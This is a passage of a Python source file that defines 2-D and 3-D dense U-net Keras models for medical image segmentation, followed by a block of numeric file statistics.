                                 axis=concatenation_axis)(outputs)
    outputs = Scale(axis=concatenation_axis)(outputs)
    outputs = Activation(activation='relu')(outputs)

    box_layers.append(outputs)
    box_count -= 1

    # Decoder: upsample and add the saved encoder layers (U-net style).
    local_number_of_filters = (K.int_shape(box_layers[box_count]))[-1]
    local_layer = Conv2D(filters=local_number_of_filters,
                         kernel_size=(1, 1),
                         padding='same',
                         kernel_initializer='normal')(box_layers[box_count - 1])
    box_count -= 1

    for i in range(number_of_dense_blocks - 1):
        upsampling_layer = UpSampling2D(size=(2, 2))(outputs)
        outputs = Add()([local_layer, upsampling_layer])

        local_layer = box_layers[box_count - 1]
        box_count -= 1

        local_number_of_filters = (K.int_shape(box_layers[box_count]))[-1]
        outputs = Conv2D(filters=local_number_of_filters,
                         kernel_size=(3, 3),
                         padding='same',
                         kernel_initializer='normal')(outputs)

        if i == (number_of_dense_blocks - 2):
            outputs = Dropout(rate=0.3)(outputs)

        outputs = BatchNormalization(epsilon=1.1e-5,
                                     axis=concatenation_axis)(outputs)
        outputs = Activation(activation='relu')(outputs)

    convActivation = ''
    if mode == 'classification':
        convActivation = 'softmax'
    elif mode == 'regression':
        convActivation = 'linear'
    else:
        raise ValueError('mode must be either `classification` or `regression`.')

    outputs = Conv2D(filters=number_of_outputs,
                     kernel_size=(1, 1),
                     activation=convActivation,
                     kernel_initializer='normal')(outputs)

    denseunet_model = Model(inputs=inputs, outputs=outputs)

    return denseunet_model
def create_denseunet_model_3d(input_image_size,
                              number_of_outputs=1,
                              number_of_layers_per_dense_block=(6, 12, 36, 24),
                              growth_rate=48,
                              initial_number_of_filters=96,
                              reduction_rate=0.0,
                              depth=7,
                              dropout_rate=0.0,
                              weight_decay=1e-4,
                              mode='classification'
                              ):
    """
    3-D implementation of the dense U-net deep learning architecture.

    Creates a keras model of the dense U-net deep learning architecture for
    image segmentation

    X. Li, H. Chen, X. Qi, Q. Dou, C.-W. Fu, P.-A. Heng. H-DenseUNet: Hybrid
    Densely Connected UNet for Liver and Tumor Segmentation from CT Volumes

    available here:

            https://arxiv.org/pdf/1709.07330.pdf

    with the author's implementation available at:

            https://github.com/xmengli999/H-DenseUNet

    Arguments
    ---------
    input_image_size : tuple of length 4
        Used for specifying the input tensor shape.  The
        shape (or dimension) of that tensor is the image dimensions followed by
        the number of channels (e.g., red, green, and blue).  The batch size
        (i.e., number of training images) is not specified a priori.

    number_of_outputs : integer
        Meaning depends on the mode.  For 'classification' this is the number of
        segmentation labels.  For 'regression' this is the number of outputs.

    number_of_layers_per_dense_blocks : tuple
        Number of dense blocks per layer.

    growth_rate : integer
        Number of filters to add for each dense block layer (default = 48).

    initial_number_of_filters : integer
        Number of filters at the beginning (default = 96).

    reduction_rate : scalar
        Reduction factor of transition blocks.

    depth : integer
        Number of layers---must be equal to 3 * N + 4 where N is an integer
        (default = 7).

    dropout_rate : scalar
        Float between 0 and 1 to use between dense layers.

    weight_decay : scalar
        Weighting parameter for L2 regularization of the kernel weights of the
        convolution layers (default = 1e-4).

    mode : string
        'classification' (softmax final activation) or 'regression' (linear
        final activation).

    Returns
    -------
    Keras model
        A 3-D Keras model defining the network.

    Example
    -------
    >>> model = create_denseunet_model_3d((128, 128, 128, 1))
    >>> model.summary()
    """

    # Dense blocks concatenate feature maps along the channel axis, whose
    # position depends on the backend image data format.
    concatenation_axis = 1
    if K.image_data_format() == 'channels_last':
        concatenation_axis = -1

    def convolution_factory_3d(model, number_of_filters,
                               kernel_size=(3, 3, 3),
                               dropout_rate=0.0, weight_decay=1e-4):
        # BN -> Scale -> ReLU -> 1x1x1 "bottleneck" conv (4x filters),
        # then BN -> Scale -> ReLU -> padded kxkxk conv.
        model = BatchNormalization(axis=concatenation_axis)(model)
        model = Scale(axis=concatenation_axis)(model)
        model = Activation('relu')(model)
        model = Conv3D(filters=(number_of_filters * 4),
                       kernel_size=(1, 1, 1),
                       use_bias=False)(model)
        if dropout_rate > 0.0:
            model = Dropout(rate=dropout_rate)(model)
        # Convolution layer
        model = BatchNormalization(axis=concatenation_axis,
                                   epsilon=1.1e-5)(model)
        model = Scale(axis=concatenation_axis)(model)
        model = Activation(activation='relu')(model)
        model = ZeroPadding3D(padding=(1, 1, 1))(model)
        model = Conv3D(filters=number_of_filters,
                       kernel_size=kernel_size,
                       use_bias=False)(model)
        if dropout_rate > 0.0:
            model = Dropout(rate=dropout_rate)(model)
        return model

    def transition_3d(model, number_of_filters, compression_rate=1.0,
                      dropout_rate=0.0, weight_decay=1e-4):
        # Transition block: 1x1x1 conv with channel compression followed by
        # 2x2x2 average pooling (spatial downsampling).
        model = BatchNormalization(axis=concatenation_axis,
                                   gamma_regularizer=regularizers.l2(weight_decay),
                                   beta_regularizer=regularizers.l2(weight_decay))(model)
        model = Scale(axis=concatenation_axis)(model)
        model = Activation(activation='relu')(model)
        model = Conv3D(filters=int(number_of_filters * compression_rate),
                       kernel_size=(1, 1, 1),
                       use_bias=False)(model)
        if dropout_rate > 0.0:
            model = Dropout(rate=dropout_rate)(model)
        model = AveragePooling3D(pool_size=(2, 2, 2),
                                 strides=(2, 2, 2))(model)
        return model

    def create_dense_blocks_3d(model, number_of_filters, depth, growth_rate,
                               dropout_rate=0.0, weight_decay=1e-4):
        # Each layer's output is concatenated with all previous layers'
        # outputs (dense connectivity); channels grow by growth_rate per layer.
        dense_block_layers = [model]
        for i in range(depth):
            model = convolution_factory_3d(model, number_of_filters=growth_rate,
                                           kernel_size=(3, 3, 3),
                                           dropout_rate=dropout_rate,
                                           weight_decay=weight_decay)
            dense_block_layers.append(model)
            model = Concatenate(axis=concatenation_axis)(dense_block_layers)
            number_of_filters += growth_rate
        return model, number_of_filters

    if ((depth - 4) % 3) != 0:
        raise ValueError('Depth must be equal to 3*N+4 where N is an integer.')
    # N in depth = 3 * N + 4.  (Fixed: the original computed '(depth - 4) % 3',
    # which is always 0 after the check above; integer division is intended.)
    number_of_layers = (depth - 4) // 3

    number_of_dense_blocks = len(number_of_layers_per_dense_block)

    inputs = Input(shape=input_image_size)

    # Encoder outputs saved for the decoder's skip connections.
    box_layers = []
    box_count = 1

    # Initial convolution.  Fixed: ZeroPadding3D requires 3-D padding; the
    # original passed the 2-D value (3, 3), which fails at layer-build time.
    outputs = ZeroPadding3D(padding=(3, 3, 3))(inputs)
    outputs = Conv3D(filters=initial_number_of_filters,
                     kernel_size=(7, 7, 7),
                     strides=(2, 2, 2),
                     use_bias=False)(outputs)
    outputs = BatchNormalization(epsilon=1.1e-5,
                                 axis=concatenation_axis)(outputs)
    outputs = Scale(axis=concatenation_axis)(outputs)
    outputs = Activation(activation='relu')(outputs)

    box_layers.append(outputs)
    box_count += 1

    outputs = ZeroPadding3D(padding=(1, 1, 1))(outputs)
    outputs = MaxPooling3D(pool_size=(3, 3, 3),
                           strides=(2, 2, 2))(outputs)

    # Add dense blocks (all but the last are followed by a transition block).
    nFilters = initial_number_of_filters
    for i in range(number_of_dense_blocks - 1):
        outputs, number_of_filters = \
            create_dense_blocks_3d(outputs, number_of_filters=nFilters,
                                   depth=number_of_layers_per_dense_block[i],
                                   growth_rate=growth_rate,
                                   dropout_rate=dropout_rate,
                                   weight_decay=weight_decay)

        box_layers.append(outputs)
        box_count += 1

        outputs = transition_3d(outputs, number_of_filters=number_of_filters,
                                compression_rate=(1.0 - reduction_rate),
                                dropout_rate=dropout_rate,
                                weight_decay=weight_decay)
        nFilters = int(number_of_filters * (1 - reduction_rate))

    # Final dense block (no trailing transition).
    outputs, nFilters = \
        create_dense_blocks_3d(outputs, number_of_filters=nFilters,
                               depth=number_of_layers_per_dense_block[number_of_dense_blocks - 1],
                               growth_rate=growth_rate,
                               dropout_rate=dropout_rate,
                               weight_decay=weight_decay)

    outputs = BatchNormalization(epsilon=1.1e-5,
                                 axis=concatenation_axis)(outputs)
    outputs = Scale(axis=concatenation_axis)(outputs)
    outputs = Activation(activation='relu')(outputs)

    box_layers.append(outputs)
    box_count -= 1

    # Decoder: upsample and add the saved encoder layers (U-net style).
    local_number_of_filters = (K.int_shape(box_layers[box_count]))[-1]
    local_layer = Conv3D(filters=local_number_of_filters,
                         kernel_size=(1, 1, 1),
                         padding='same',
                         kernel_initializer='normal')(box_layers[box_count - 1])
    box_count -= 1

    for i in range(number_of_dense_blocks - 1):
        upsampling_layer = UpSampling3D(size=(2, 2, 2))(outputs)
        outputs = Add()([local_layer, upsampling_layer])

        local_layer = box_layers[box_count - 1]
        box_count -= 1

        local_number_of_filters = (K.int_shape(box_layers[box_count]))[-1]
        outputs = Conv3D(filters=local_number_of_filters,
                         kernel_size=(3, 3, 3),
                         padding='same',
                         kernel_initializer='normal')(outputs)

        if i == (number_of_dense_blocks - 2):
            outputs = Dropout(rate=0.3)(outputs)

        outputs = BatchNormalization(epsilon=1.1e-5,
                                     axis=concatenation_axis)(outputs)
        outputs = Activation(activation='relu')(outputs)

    convActivation = ''
    if mode == 'classification':
        convActivation = 'softmax'
    elif mode == 'regression':
        convActivation = 'linear'
    else:
        raise ValueError('mode must be either `classification` or `regression`.')

    outputs = Conv3D(filters=number_of_outputs,
                     kernel_size=(1, 1, 1),
                     activation=convActivation,
                     kernel_initializer='normal')(outputs)

    denseunet_model = Model(inputs=inputs, outputs=outputs)

    return denseunet_model
| 37.136882
| 97
| 0.588308
| 2,193
| 19,534
| 5.012312
| 0.102599
| 0.065502
| 0.068231
| 0.016558
| 0.933679
| 0.919487
| 0.918395
| 0.913664
| 0.900018
| 0.867813
| 0
| 0.028463
| 0.325535
| 19,534
| 525
| 98
| 37.207619
| 0.805844
| 0.191615
| 0
| 0.795918
| 0
| 0
| 0.028288
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.027211
| false
| 0
| 0.02381
| 0
| 0.057823
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.